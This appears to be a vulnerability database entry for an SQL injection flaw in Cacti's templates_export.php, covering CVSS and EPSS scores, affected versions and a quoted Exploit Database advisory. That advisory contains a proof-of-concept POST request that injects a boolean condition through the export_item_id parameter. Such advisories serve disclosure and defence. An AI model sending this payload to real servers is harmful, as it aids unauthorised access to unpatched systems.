Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-89 |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 12338
Publication date : 2010-04-21 22h00 +00:00
Author : Nahuel Grisolia
EDB Verified : Yes
CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
A Vulnerability has been discovered in Cacti, which can be exploited by any
user to conduct SQL Injection attacks.
Input passed via the “export_item_id” parameter to “templates_export.php”
script is not properly sanitized before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL
code.
The following is a Proof of Concept POST request:
POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: 192.168.1.107
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://192.168.1.107/cacti-0.8.7e/templates_export.php
Cookie: Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&save_component_export=1&action=save&x=24&y=12
===========================================================================
Download:
===========================================================================
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf)
<Bonsai Information Security Advisories>
http://www.bonsai-sec.com/en/research/vulnerability.php
Products Mentioned
Configuraton 0
Cacti>>Cacti >> Version To (including) 0.8.7e
Cacti>>Cacti >> Version 0.5
Cacti>>Cacti >> Version 0.6
Cacti>>Cacti >> Version 0.6.1
Cacti>>Cacti >> Version 0.6.2
Cacti>>Cacti >> Version 0.6.3
Cacti>>Cacti >> Version 0.6.4
Cacti>>Cacti >> Version 0.6.5
Cacti>>Cacti >> Version 0.6.6
Cacti>>Cacti >> Version 0.6.7
Cacti>>Cacti >> Version 0.6.8
Cacti>>Cacti >> Version 0.6.8a
Cacti>>Cacti >> Version 0.8
Cacti>>Cacti >> Version 0.8.1
Cacti>>Cacti >> Version 0.8.2
Cacti>>Cacti >> Version 0.8.2a
Cacti>>Cacti >> Version 0.8.3
Cacti>>Cacti >> Version 0.8.3a
Cacti>>Cacti >> Version 0.8.4
Cacti>>Cacti >> Version 0.8.5
Cacti>>Cacti >> Version 0.8.5a
Cacti>>Cacti >> Version 0.8.6
Cacti>>Cacti >> Version 0.8.6a
Cacti>>Cacti >> Version 0.8.6b
Cacti>>Cacti >> Version 0.8.6c
Cacti>>Cacti >> Version 0.8.6d
Cacti>>Cacti >> Version 0.8.6f
Cacti>>Cacti >> Version 0.8.6g
Cacti>>Cacti >> Version 0.8.6h
Cacti>>Cacti >> Version 0.8.6i
Cacti>>Cacti >> Version 0.8.6j
Cacti>>Cacti >> Version 0.8.6k
Cacti>>Cacti >> Version 0.8.7
Cacti>>Cacti >> Version 0.8.7a
Cacti>>Cacti >> Version 0.8.7b
Cacti>>Cacti >> Version 0.8.7c
Cacti>>Cacti >> Version 0.8.7d
References